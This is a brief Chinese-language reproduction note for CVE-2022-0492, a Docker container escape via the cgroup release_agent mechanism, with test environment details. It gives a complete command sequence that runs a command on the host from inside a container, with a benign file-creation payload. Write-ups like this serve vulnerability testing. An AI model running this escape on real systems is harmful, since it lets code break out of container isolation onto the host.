Docker >> Container Escape
CVE-2022-0492
參考資訊:
1. CVE-2022-0492
2. containerd.io_1.2.13-2_amd64.deb
3. docker-ce_19.03.10~3-0~ubuntu-focal_amd64.deb
4. docker-ce-cli_19.03.10~3-0~ubuntu-focal_amd64.deb
測試環境:
Ubuntu 20.04 (5.4.0-21-generic)
Docker version 19.03.10, build 9424aeaee9
測試步驟:
$ sudo docker run --rm -it --security-opt apparmor=unconfined --security-opt seccomp=unconfined ubuntu:22.04 /bin/bash cve:/# unshare -UrmC --propagation=unchanged bash cve:/# mkdir /tmp/test cve:/# mount -t cgroup -o rdma cgroup /tmp/test cve:/# mkdir /tmp/test/x cve:/# echo 1 > /tmp/test/x/notify_on_release cve:/# echo '#!/bin/sh' > /cmd cve:/# echo "touch /tmp/cve_test" >> /cmd cve:/# chmod 0777 /cmd cve:/# host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` cve:/# echo "$host_path/cmd" > /tmp/test/release_agent cve:/# sh -c "echo \$\$ > /tmp/test/x/cgroup.procs" cve:/# exit cve:/# exit # ls /tmp cve_test